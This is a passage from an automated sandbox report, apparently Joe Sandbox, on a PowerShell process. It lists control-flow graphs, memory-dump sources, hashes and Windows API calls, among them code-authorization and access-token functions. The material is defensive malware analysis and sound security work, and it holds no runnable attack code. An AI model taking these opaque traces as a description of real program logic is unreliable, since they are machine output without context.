7a82c67 41559->41552 41560->41559 41562 7a82a18 41560->41562 41563 7a82a50 41562->41563 41570 7a810a4 41563->41570 41565 7a82a8c 41566 7a810b0 ComputeAccessTokenFromCodeAuthzLevel 41565->41566 41567 7a82aab 41565->41567 41566->41567 41569 7a82a18 IdentifyCodeAuthzLevelW ComputeAccessTokenFromCodeAuthzLevel 41567->41569 41568 7a82bd6 41568->41559 41569->41568 41572 7a88108 IdentifyCodeAuthzLevelW 41570->41572 41573 7a8822f 41572->41573 41574 7a895e0 41575 7a895e7 41574->41575 41576 7a895ed 41575->41576 41578 7a88ea8 41575->41578 41580 7a88ee6 41578->41580 41579 7a88f33 41579->41576 41580->41579 41581 7a83390 2 API calls 41580->41581 41582 7a88fd1 41581->41582 41582->41579 41583 7a82a18 2 API calls 41582->41583 41583->41582 41587 c799de 41588 c79998 41587->41588 41589 c799e1 41587->41589 41589->41588 41590 c79d73 FindFirstFileNameTransactedW 41589->41590 41591 c79d82 41589->41591 41590->41591 41592 c7a06f 41591->41592 41595 c7a5e8 ShowOwnedPopups 41591->41595 41596 c7a5f8 ShowOwnedPopups 41591->41596 41595->41592 41596->41592 41649 c79c6e 41650 c79cbf 41649->41650 41651 c79d73 FindFirstFileNameTransactedW 41650->41651 41652 c79d82 41650->41652 41651->41652 41653 c7a06f 41652->41653 41656 c7a5e8 ShowOwnedPopups 41652->41656 41657 c7a5f8 ShowOwnedPopups 41652->41657 41656->41653 41657->41653

                                                                Executed Functions

                                                                Function 00C799DE, Relevance: 2.2, APIs: 1, Instructions: 726COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 c799de-c799df 1 c799e1-c799eb 0->1 2 c799aa-c799b1 0->2 5 c799ed-c79a13 1->5 6 c79a18-c79a32 1->6 3 c799b3-c799b9 2->3 4 c799c1-c799ca 2->4 3->4 7 c799cc 4->7 8 c79998-c799b1 4->8 11 c79c39-c79c40 5->11 14 c79a34-c79a8d 6->14 15 c79a92-c79aac 6->15 7->11 8->3 8->4 14->11 19 c79ab2-c79ac4 15->19 20 c79bdb-c79bf5 15->20 21 c79aca-c79ad3 19->21 22 c79bd9 19->22 20->11 29 c79bf7-c79c31 20->29 23 c79c77-c79cc1 21->23 24 c79ad9-c79b08 21->24 22->11 32 c79cc3-c79ccb 23->32 33 c79cd1-c79ce5 23->33 40 c79b11-c79b19 24->40 41 c79b0a-c79b0f 24->41 29->11 32->33 44 c7a145-c7a165 32->44 34 c7a16d-c7a174 33->34 35 c79ceb-c79cf2 33->35 50 c7a179-c7a180 34->50 38 c79cf4-c79cff 35->38 39 c79d43-c79d45 35->39 38->39 55 c79d01-c79d09 38->55 42 c7a185 39->42 43 c79d4b-c79d57 39->43 45 c79b21-c79bb7 40->45 41->45 53 c7a18f-c7a1b4 42->53 51 c79d6f-c79d71 43->51 52 c79d59-c79d67 43->52 44->34 60 c79bc7-c79bd3 45->60 61 c79bb9-c79bbf 45->61 50->42 57 c79d73-c79d80 FindFirstFileNameTransactedW 51->57 58 c79d82-c79d89 51->58 52->53 69 c79d6d 52->69 53->51 55->50 59 c79d0f-c79d16 55->59 57->58 67 c79d8f-c79d9b 58->67 68 c7a1b9 58->68 59->39 66 c79d18-c79d2e 59->66 60->21 60->22 61->60 66->39 81 c79d30-c79d37 66->81 70 c79da1-c79da8 67->70 71 c7a29f-c7a2a9 67->71 77 c7a1c3-c7a1ca 68->77 69->51 75 c7a001-c7a005 70->75 76 c79dae-c79dc9 70->76 83 c7a31f-c7a328 71->83 84 c7a2ab-c7a2bd 71->84 79 c7a007-c7a015 75->79 80 c7a072-c7a078 75->80 76->75 89 c79dcf-c79dd7 76->89 94 c7a1cf-c7a1d6 77->94 98 c7a01b-c7a042 79->98 99 c7a22a-c7a238 79->99 85 c7a07e-c7a08f 80->85 86 c7a13d-c7a140 80->86 81->39 87 c79d39-c79d41 81->87 102 c7a38f-c7a3ad 83->102 103 c7a32a-c7a33a 83->103 84->83 104 c7a2bf-c7a31a 84->104 105 c7a095-c7a0aa 85->105 106 c7a3f8-c7a407 85->106 90 c7a593-c7a59a 86->90 87->39 89->77 93 c79ddd-c79de4 89->93 100 c79f33-c79f7d 93->100 101 c79dea-c79dff 93->101 119 c7a1db-c7a1e2 94->119 145 c7a044-c7a047 98->145 146 c7a050-c7a067 98->146 99->80 117 c7a23e-c7a25b 99->117 162 c79f83-c79f8f 100->162 163 c7a20d-c7a214 100->163 101->100 118 c79e05-c79e0d 101->118 132 c7a3d4-c7a3f0 102->132 133 c7a3af-c7a3be 102->133 137 c7a363-c7a387 103->137 138 c7a33c-c7a35b 103->138 104->90 139 c7a0ac-c7a0bb 105->139 121 c7a480-c7a48f 106->121 122 c7a409-c7a418 106->122 117->80 130 c7a261-c7a29a 117->130 118->94 126 c79e13-c79e1a 118->126 153 c7a1e7-c7a1ee 119->153 142 c7a491-c7a4a8 121->142 143 c7a4ad-c7a4bc 121->143 122->121 147 c7a41a-c7a47b 122->147 134 c79e37-c79e41 126->134 135 c79e1c-c79e24 126->135 130->80 132->90 133->132 166 c7a3c0-c7a3cb 133->166 134->100 149 c79e47-c79e4f 134->149 135->119 148 c79e2a-c79e31 135->148 137->102 138->137 170 c7a0e3-c7a132 139->170 171 c7a0bd-c7a0cc 139->171 142->139 143->139 173 c7a4c2-c7a4d9 143->173 145->146 242 c7a069 call c7a5e8 146->242 243 c7a069 call c7a5f8 146->243 147->139 148->100 148->134 149->153 157 c79e55-c79e5c 149->157 153->71 167 c79e8e-c79e9d 157->167 168 c79e5e-c79e6d 157->168 191 c79f95-c79feb 162->191 192 c7a1f3-c7a208 162->192 175 c79ff4-c79ffe 163->175 176 c7a21a-c7a225 163->176 165 c7a06f 165->80 166->132 194 c7a3cd-c7a3d0 166->194 187 c79e9f-c79eae 167->187 188 c79ecb-c79eda 167->188 168->167 195 c79e6f-c79e88 168->195 225 c7a134 170->225 171->170 186 c7a0ce-c7a0dd 171->186 173->139 175->75 176->175 186->170 206 c7a4de-c7a540 186->206 187->188 207 c79eb0-c79ec9 187->207 188->75 209 c79ee0-c79eef 188->209 191->175 192->175 194->132 195->100 195->167 206->225 207->100 207->188 209->75 219 c79ef5-c79f0e 209->219 219->75 233 c79f14-c79f2d 219->233 225->86 233->75 233->100 242->165 243->165
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.427065080.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_c70000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2af97fa5aa2918b5fea6fb07d094db69e1dff7fd2ff797c9aa9856900aabe9d6
                                                                • Instruction ID: e22b038804a7b7eabc2ec1b894269295dfaa9e7c8e4b2f4a7b8f87817b39cce0
                                                                • Opcode Fuzzy Hash: 2af97fa5aa2918b5fea6fb07d094db69e1dff7fd2ff797c9aa9856900aabe9d6
                                                                • Instruction Fuzzy Hash: 3A527E34B002088FDB14DFA5C994AAEBBB6FF88304F14C469E90A9B355DB39DE45CB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00C79C6E, Relevance: 1.9, APIs: 1, Instructions: 378COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 360 c79c6e-c79cc1 362 c79cc3-c79ccb 360->362 363 c79cd1-c79ce5 360->363 362->363 371 c7a145-c7a165 362->371 364 c7a16d-c7a174 363->364 365 c79ceb-c79cf2 363->365 375 c7a179-c7a180 364->375 367 c79cf4-c79cff 365->367 368 c79d43-c79d45 365->368 367->368 380 c79d01-c79d09 367->380 369 c7a185 368->369 370 c79d4b-c79d57 368->370 378 c7a18f-c7a1b4 369->378 376 c79d6f-c79d71 370->376 377 c79d59-c79d67 370->377 371->364 375->369 381 c79d73-c79d80 FindFirstFileNameTransactedW 376->381 382 c79d82-c79d89 376->382 377->378 391 c79d6d 377->391 378->376 380->375 383 c79d0f-c79d16 380->383 381->382 389 c79d8f-c79d9b 382->389 390 c7a1b9 382->390 383->368 388 c79d18-c79d2e 383->388 388->368 403 c79d30-c79d37 388->403 392 c79da1-c79da8 389->392 393 c7a29f-c7a2a9 389->393 399 c7a1c3-c7a1ca 390->399 391->376 397 c7a001-c7a005 392->397 398 c79dae-c79dc9 392->398 405 c7a31f-c7a328 393->405 406 c7a2ab-c7a2bd 393->406 401 c7a007-c7a015 397->401 402 c7a072-c7a078 397->402 398->397 411 c79dcf-c79dd7 398->411 416 c7a1cf-c7a1d6 399->416 420 c7a01b-c7a042 401->420 421 c7a22a-c7a238 401->421 407 c7a07e-c7a08f 402->407 408 c7a13d-c7a140 402->408 403->368 409 c79d39-c79d41 403->409 424 c7a38f-c7a3ad 405->424 425 c7a32a-c7a33a 405->425 406->405 426 c7a2bf-c7a31a 406->426 427 c7a095-c7a0aa 407->427 428 c7a3f8-c7a407 407->428 412 c7a593-c7a59a 408->412 409->368 411->399 415 c79ddd-c79de4 411->415 422 c79f33-c79f7d 415->422 423 c79dea-c79dff 415->423 441 c7a1db-c7a1e2 416->441 467 c7a044-c7a047 420->467 468 c7a050-c7a067 420->468 421->402 439 c7a23e-c7a25b 421->439 484 c79f83-c79f8f 422->484 485 c7a20d-c7a214 422->485 423->422 440 c79e05-c79e0d 423->440 454 c7a3d4-c7a3f0 424->454 455 c7a3af-c7a3be 424->455 459 c7a363-c7a387 425->459 460 c7a33c-c7a35b 425->460 426->412 461 c7a0ac-c7a0bb 427->461 443 c7a480-c7a48f 428->443 444 c7a409-c7a418 428->444 439->402 452 c7a261-c7a29a 439->452 440->416 448 c79e13-c79e1a 440->448 475 c7a1e7-c7a1ee 441->475 464 c7a491-c7a4a8 443->464 465 c7a4ad-c7a4bc 443->465 444->443 469 c7a41a-c7a47b 444->469 456 c79e37-c79e41 448->456 457 c79e1c-c79e24 448->457 452->402 454->412 455->454 488 c7a3c0-c7a3cb 455->488 456->422 471 c79e47-c79e4f 456->471 457->441 470 c79e2a-c79e31 457->470 459->424 460->459 492 c7a0e3-c7a132 461->492 493 c7a0bd-c7a0cc 461->493 464->461 465->461 495 c7a4c2-c7a4d9 465->495 467->468 564 c7a069 call c7a5e8 468->564 565 c7a069 call c7a5f8 468->565 469->461 470->422 470->456 471->475 479 c79e55-c79e5c 471->479 475->393 489 c79e8e-c79e9d 479->489 490 c79e5e-c79e6d 479->490 513 c79f95-c79feb 484->513 514 c7a1f3-c7a208 484->514 497 c79ff4-c79ffe 485->497 498 c7a21a-c7a225 485->498 487 c7a06f 487->402 488->454 516 c7a3cd-c7a3d0 488->516 509 c79e9f-c79eae 489->509 510 c79ecb-c79eda 489->510 490->489 517 c79e6f-c79e88 490->517 547 c7a134 492->547 493->492 508 c7a0ce-c7a0dd 493->508 495->461 497->397 498->497 508->492 528 c7a4de-c7a540 508->528 509->510 529 c79eb0-c79ec9 509->529 510->397 531 c79ee0-c79eef 510->531 513->497 514->497 516->454 517->422 517->489 528->547 529->422 529->510 531->397 541 c79ef5-c79f0e 531->541 541->397 555 c79f14-c79f2d 541->555 547->408 555->397 555->422 564->487 565->487
                                                                APIs
                                                                • FindFirstFileNameTransactedW.KERNEL32 ref: 00C79D7B
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.427065080.0000000000C70000.00000040.00000001.sdmp, Offset: 00C70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_c70000_powershell.jbxd
                                                                Similarity
                                                                • API ID: FileFindFirstNameTransacted
                                                                • String ID:
                                                                • API String ID: 2802389721-0
                                                                • Opcode ID: b4c52807b5231238fbee79dc7c786001f75f8021689c73f16f307582ca7b7688
                                                                • Instruction ID: cff053cdaf369657692beea7a2dfdede6d15a81a79655393679d2f6e363d9ee0
                                                                • Opcode Fuzzy Hash: b4c52807b5231238fbee79dc7c786001f75f8021689c73f16f307582ca7b7688
                                                                • Instruction Fuzzy Hash: 5CE14E34B002089FEB18DBB5C954AAE77F6EF88304F108068E916DB395EB79DE45CB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07A8DEB8, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 865 7a8deb8-7a8df2c GetSystemInfo 867 7a8df2e 865->867 868 7a8df33-7a8df47 865->868 867->868
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.453837084.0000000007A80000.00000040.00000001.sdmp, Offset: 07A80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_7a80000_powershell.jbxd
                                                                Similarity
                                                                • API ID: InfoSystem
                                                                • String ID:
                                                                • API String ID: 31276548-0
                                                                • Opcode ID: 505a79669ec03d74e7dabcc81c954dc2ef460956900f24ec8659d733ad01d725
                                                                • Instruction ID: 8b8534e88b1f37fa281d52d0498bf416896538206464b12d877c35f7341eaeb3
                                                                • Opcode Fuzzy Hash: 505a79669ec03d74e7dabcc81c954dc2ef460956900f24ec8659d733ad01d725
                                                                • Instruction Fuzzy Hash: D511E0B5D002599BCB00CF9AD844BDEFBF4FB48314F14811AE828A3240C3746954CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00C042A9, Relevance: 1.9, APIs: 1, Instructions: 431COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 244 c042a9-c0430b 247 c04311-c04315 244->247 248 c043ea-c043ee 244->248 247->248 251 c0431b-c04326 247->251 249 c043f4-c043f9 248->249 250 c046fe-c04705 248->250 252 c046c3-c046cf 249->252 253 c047e6-c04802 250->253 254 c0470b-c0470f 250->254 263 c043c7-c043de 251->263 264 c0432c-c04348 251->264 255 c046d5-c046dc 252->255 256 c04407-c04413 252->256 358 c04805 call c02450 253->358 359 c04805 call c02460 253->359 254->253 258 c04715-c0471c 254->258 255->250 261 c046de-c046f2 255->261 259 c04419-c046af 256->259 260 c04a1c-c04a21 256->260 258->253 265 c04722-c04726 258->265 334 c046b1 259->334 335 c046bd 259->335 277 c04a2d-c04a31 260->277 261->250 262 c04808-c04820 270 c04826-c0485a 262->270 271 c049fd-c04a01 262->271 263->248 284 c04389-c043b6 264->284 285 c0434a-c04387 264->285 265->253 267 c0472c-c047a9 265->267 267->253 344 c047ab-c047de 267->344 270->277 283 c04860-c04878 270->283 274 c04a07-c04a17 271->274 275 c0490f-c04911 271->275 279 c04917-c049f2 274->279 275->279 289 c04a3c-c04a49 AddConsoleAliasA 277->289 279->271 295 c04bc1-c04be3 283->295 296 c0487e-c04888 283->296 307 c043c4 284->307 308 c043b8 284->308 285->284 293 c04b61-c04b65 289->293 294 c04a4f-c04a95 289->294 299 c04b67-c04b77 293->299 300 c04b8c-c04b93 293->300 337 c04b05-c04b32 294->337 338 c04a97-c04ade 294->338 312 c04bf1 295->312 313 c04be5 295->313 303 c0488a-c048a7 296->303 304 c048af-c048cd 296->304 299->300 300->295 311 c04b95-c04bb9 300->311 303->304 304->295 324 c048d3-c048e0 304->324 307->263 308->307 311->295 322 c04bf2 312->322 313->312 322->322 325 c048f2-c048fc 324->325 326 c048e2-c048ec 324->326 325->295 332 c04902-c0490a 325->332 326->295 326->325 332->289 334->335 335->252 347 c04b40 337->347 348 c04b34 337->348 353 c04ae0-c04af3 338->353 354 c04af5-c04b03 338->354 344->253 347->293 348->347 353->337 354->337 354->338 358->262 359->262
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.426264504.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_c00000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: be1cff4855c9a1721c13e794054a52874c9da2e93a7be94b53977f62fc1fdc85
                                                                • Instruction ID: e10778be751acd30059d973c66381294ce84177b0e9b4f98432a0593ae1f7cf3
                                                                • Opcode Fuzzy Hash: be1cff4855c9a1721c13e794054a52874c9da2e93a7be94b53977f62fc1fdc85
                                                                • Instruction Fuzzy Hash: A0122D74A00218DFDB29DF54D854B9ABBF2FF48301F1585A9E909A73A1CB359E81CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00C043FE, Relevance: 1.7, APIs: 1, Instructions: 212COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 566 c043fe-c04405 567 c046c3-c046cf 566->567 568 c043ea-c043ee 566->568 571 c046d5-c046dc 567->571 572 c04407-c04413 567->572 569 c043f4-c043f9 568->569 570 c046fe-c04705 568->570 569->567 576 c047e6-c04802 570->576 577 c0470b-c0470f 570->577 571->570 575 c046de-c046f2 571->575 573 c04419-c046af 572->573 574 c04a1c-c04a21 572->574 632 c046b1 573->632 633 c046bd 573->633 586 c04a2d-c04a31 574->586 575->570 662 c04805 call c02450 576->662 663 c04805 call c02460 576->663 577->576 578 c04715-c0471c 577->578 578->576 582 c04722-c04726 578->582 581 c04808-c04820 587 c04826-c0485a 581->587 588 c049fd-c04a01 581->588 582->576 584 c0472c-c047a9 582->584 584->576 652 c047ab-c047de 584->652 593 c04a3c-c04a49 AddConsoleAliasA 586->593 587->586 600 c04860-c04878 587->600 590 c04a07-c04a17 588->590 591 c0490f-c04911 588->591 595 c04917-c049f2 590->595 591->595 598 c04b61-c04b65 593->598 599 c04a4f-c04a95 593->599 595->588 602 c04b67-c04b77 598->602 603 c04b8c-c04b93 598->603 638 c04b05-c04b32 599->638 639 c04a97-c04ade 599->639 609 c04bc1-c04be3 600->609 611 c0487e-c04888 600->611 602->603 603->609 610 c04b95-c04bb9 603->610 617 c04bf1 609->617 618 c04be5 609->618 610->609 615 c0488a-c048a7 611->615 616 c048af-c048cd 611->616 615->616 616->609 631 c048d3-c048e0 616->631 626 c04bf2 617->626 618->617 626->626 635 c048f2-c048fc 631->635 636 c048e2-c048ec 631->636 632->633 633->567 635->609 641 c04902-c0490a 635->641 636->609 636->635 648 c04b40 638->648 649 c04b34 638->649 656 c04ae0-c04af3 639->656 657 c04af5-c04b03 639->657 641->593 648->598 649->648 652->576 656->638 657->638 657->639 662->581 663->581
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.426264504.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_c00000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d985e8deeeb894624cedb6a34bed9e612967e4d4cd1b296f518c79de8ba35fbf
                                                                • Instruction ID: bbcbee08302ad9ca79528befd1e89e2445a19e9ac0a0a0d14ddd267019790fa0
                                                                • Opcode Fuzzy Hash: d985e8deeeb894624cedb6a34bed9e612967e4d4cd1b296f518c79de8ba35fbf
                                                                • Instruction Fuzzy Hash: B8912E74A00218DFCB19DF55C854B9AB7F2BF48305F158198EA099B391DB75EE81CF90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00C046C0, Relevance: 1.7, APIs: 1, Instructions: 206COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 664 c046c0 665 c046c3-c046cf 664->665 666 c046d5-c046dc 665->666 667 c04407-c04413 665->667 670 c046fe-c04705 666->670 671 c046de-c046f2 666->671 668 c04419-c046af 667->668 669 c04a1c-c04a21 667->669 726 c046b1 668->726 727 c046bd 668->727 680 c04a2d-c04a31 669->680 672 c047e6-c04802 670->672 673 c0470b-c0470f 670->673 671->670 758 c04805 call c02450 672->758 759 c04805 call c02460 672->759 673->672 676 c04715-c0471c 673->676 676->672 678 c04722-c04726 676->678 677 c04808-c04820 683 c04826-c0485a 677->683 684 c049fd-c04a01 677->684 678->672 682 c0472c-c047a9 678->682 689 c04a3c-c04a49 AddConsoleAliasA 680->689 682->672 748 c047ab-c047de 682->748 683->680 699 c04860-c04878 683->699 686 c04a07-c04a17 684->686 687 c0490f-c04911 684->687 693 c04917-c049f2 686->693 687->693 690 c04b61-c04b65 689->690 691 c04a4f-c04a95 689->691 696 c04b67-c04b77 690->696 697 c04b8c-c04b93 690->697 731 c04b05-c04b32 691->731 732 c04a97-c04ade 691->732 693->684 696->697 703 c04bc1-c04be3 697->703 704 c04b95-c04bb9 697->704 699->703 709 c0487e-c04888 699->709 711 c04bf1 703->711 712 c04be5 703->712 704->703 715 c0488a-c048a7 709->715 716 c048af-c048cd 709->716 721 c04bf2 711->721 712->711 715->716 716->703 730 c048d3-c048e0 716->730 721->721 726->727 727->665 733 c048f2-c048fc 730->733 734 c048e2-c048ec 730->734 743 c04b40 731->743 744 c04b34 731->744 751 c04ae0-c04af3 732->751 752 c04af5-c04b03 732->752 733->703 738 c04902-c0490a 733->738 734->703 734->733 738->689 743->690 744->743 748->672 751->731 752->731 752->732 758->677 759->677
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.426264504.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_c00000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5de0fda88d68eb0f6b9ea50a8b3705cec1b12b1d77ce09332136aab440894b00
                                                                • Instruction ID: 1ca8cd3b823e59765a3221843e96bbba236017e6af23241c87b8f882ae5c078a
                                                                • Opcode Fuzzy Hash: 5de0fda88d68eb0f6b9ea50a8b3705cec1b12b1d77ce09332136aab440894b00
                                                                • Instruction Fuzzy Hash: 47910C74A00218DFCB19DF54C894B9AB7F2BF88305F158599EA099B391CB75EE81CF90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00C04811, Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 760 c04811-c04820 762 c04826-c0485a 760->762 763 c049fd-c04a01 760->763 769 c04860-c04878 762->769 770 c04a2d-c04a31 762->770 764 c04a07-c04a17 763->764 765 c0490f-c04911 763->765 767 c04917-c049f2 764->767 765->767 767->763 774 c04bc1-c04be3 769->774 775 c0487e-c04888 769->775 773 c04a3c-c04a49 AddConsoleAliasA 770->773 777 c04b61-c04b65 773->777 778 c04a4f-c04a95 773->778 784 c04bf1 774->784 785 c04be5 774->785 780 c0488a-c048a7 775->780 781 c048af-c048cd 775->781 782 c04b67-c04b77 777->782 783 c04b8c-c04b93 777->783 803 c04b05-c04b32 778->803 804 c04a97-c04ade 778->804 780->781 781->774 794 c048d3-c048e0 781->794 782->783 783->774 788 c04b95-c04bb9 783->788 792 c04bf2 784->792 785->784 788->774 792->792 796 c048f2-c048fc 794->796 797 c048e2-c048ec 794->797 796->774 800 c04902-c0490a 796->800 797->774 797->796 800->773 810 c04b40 803->810 811 c04b34 803->811 814 c04ae0-c04af3 804->814 815 c04af5-c04b03 804->815 810->777 811->810 814->803 815->803 815->804
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.426264504.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_c00000_powershell.jbxd
                                                                Similarity
                                                                • API ID: AliasConsole
                                                                • String ID:
                                                                • API String ID: 2855943285-0
                                                                • Opcode ID: 9d877c5d53ea8d9b3c3da9d3699ed980099ed1c1938a0ae0e02708a558cfdfe5
                                                                • Instruction ID: aab1ca26bee9d0b1e307d1dd8ddab192fc8749c327dfa80bfa3c9b5ba6f7a07a
                                                                • Opcode Fuzzy Hash: 9d877c5d53ea8d9b3c3da9d3699ed980099ed1c1938a0ae0e02708a558cfdfe5
                                                                • Instruction Fuzzy Hash: B5512E74A106188FCB29DF14D894B9AB7F2BF48305F1581E8DA09A7391DB34EE81CF80
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07A810A4, Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 818 7a810a4-7a881ce 822 7a881df-7a8822d IdentifyCodeAuthzLevelW 818->822 823 7a881d0-7a881dc 818->823 824 7a8822f-7a88235 822->824 825 7a88236-7a8827f 822->825 823->822 824->825 829 7a88291-7a88298 825->829 830 7a88281-7a88287 825->830 831 7a8829a-7a882a9 829->831 832 7a882af 829->832 830->829 831->832 834 7a882b0 832->834 834->834
                                                                APIs
                                                                • IdentifyCodeAuthzLevelW.ADVAPI32(00000001,?,?,00000000), ref: 07A8821A
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.453837084.0000000007A80000.00000040.00000001.sdmp, Offset: 07A80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_7a80000_powershell.jbxd
                                                                Similarity
                                                                • API ID: AuthzCodeIdentifyLevel
                                                                • String ID:
                                                                • API String ID: 1431151113-0
                                                                • Opcode ID: 869ca20b1e7d6c25358940a05ffbbbda434b5a2846e97345430ad4654bb3d743
                                                                • Instruction ID: 7dfa5c28e5d5155f42cfa4fe2fe9e403f4b6d5e4bd9dd7ec58bbdfb3013a4f62
                                                                • Opcode Fuzzy Hash: 869ca20b1e7d6c25358940a05ffbbbda434b5a2846e97345430ad4654bb3d743
                                                                • Instruction Fuzzy Hash: F741F4B090026ADFEB64DF99C984BDEBBB4BB48304F5085EAD41DB7240DB745A84CF60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07A880FC, Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 835 7a880fc-7a881ce 838 7a881df-7a8822d IdentifyCodeAuthzLevelW 835->838 839 7a881d0-7a881dc 835->839 840 7a8822f-7a88235 838->840 841 7a88236-7a8827f 838->841 839->838 840->841 845 7a88291-7a88298 841->845 846 7a88281-7a88287 841->846 847 7a8829a-7a882a9 845->847 848 7a882af 845->848 846->845 847->848 850 7a882b0 848->850 850->850
                                                                APIs
                                                                • IdentifyCodeAuthzLevelW.ADVAPI32(00000001,?,?,00000000), ref: 07A8821A
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.453837084.0000000007A80000.00000040.00000001.sdmp, Offset: 07A80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_7a80000_powershell.jbxd
                                                                Similarity
                                                                • API ID: AuthzCodeIdentifyLevel
                                                                • String ID:
                                                                • API String ID: 1431151113-0
                                                                • Opcode ID: f677f1d7e59c7f6a419a1a390001f9107f094e398d754acc949a3f2521d7ac7b
                                                                • Instruction ID: fccf63f7f2a855725ec0ea846b02a50d924ea301fc07849514cfd8c892ab0abd
                                                                • Opcode Fuzzy Hash: f677f1d7e59c7f6a419a1a390001f9107f094e398d754acc949a3f2521d7ac7b
                                                                • Instruction Fuzzy Hash: F941F6B090026ADFEB24DF59C984BDEBBB4BB48304F5085EAD41DB7240DB745A88CF60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07A8D068, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 851 7a8d068-7a8d0b0 853 7a8d0b8-7a8d0f3 ComputeAccessTokenFromCodeAuthzLevel 851->853 854 7a8d0fc-7a8d124 853->854 855 7a8d0f5-7a8d0fb 853->855 855->854
                                                                APIs
                                                                • ComputeAccessTokenFromCodeAuthzLevel.ADVAPI32(?,00000000,?,?,?), ref: 07A8D0E6
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.453837084.0000000007A80000.00000040.00000001.sdmp, Offset: 07A80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_7a80000_powershell.jbxd
                                                                Similarity
                                                                • API ID: AccessAuthzCodeComputeFromLevelToken
                                                                • String ID:
                                                                • API String ID: 132034935-0
                                                                • Opcode ID: 0414c1c8c2c52e3374471c959938104beefde865428be9cda7835f894c310839
                                                                • Instruction ID: b8d7b092dc1f2af63a3779ba872eec1e59adac45f243b7e84e2a5c62d4893d84
                                                                • Opcode Fuzzy Hash: 0414c1c8c2c52e3374471c959938104beefde865428be9cda7835f894c310839
                                                                • Instruction Fuzzy Hash: 102135B5900249DFCB10CFAAD884BDEBBF4FF48324F14842AE528A7640C738A545CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 07A810B0, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 858 7a810b0-7a8d0f3 ComputeAccessTokenFromCodeAuthzLevel 861 7a8d0fc-7a8d124 858->861 862 7a8d0f5-7a8d0fb 858->862 862->861
                                                                APIs
                                                                • ComputeAccessTokenFromCodeAuthzLevel.ADVAPI32(?,00000000,?,?,?), ref: 07A8D0E6
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.453837084.0000000007A80000.00000040.00000001.sdmp, Offset: 07A80000, based on PE: false
